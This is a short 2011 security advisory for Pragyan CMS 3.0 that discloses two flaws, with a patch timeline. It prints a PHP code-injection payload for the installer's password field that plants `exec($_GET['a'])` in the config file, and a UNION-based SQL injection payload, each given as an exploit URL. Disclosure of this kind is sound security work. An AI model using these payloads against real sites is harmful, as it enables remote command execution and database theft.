#Pragyan CMS v 3.0 mutiple Vulnerabilities#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/#Blog - http://bugix-security.blogspot.com#http://www.aslitsecurity.blogspot.com/#Pragyan CMS v 3.0
Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibility to write at password field string:");echo exec($_GET["a"]);echo ("orin another fields with turned of javascript.in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
2) sql injection
- get mysql version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
Solution
update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02: Initial release
2011-20-02: Reported to vendor
2011-25-02: patch released
2011-25-02: public disclose
Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
Abhishek Lyall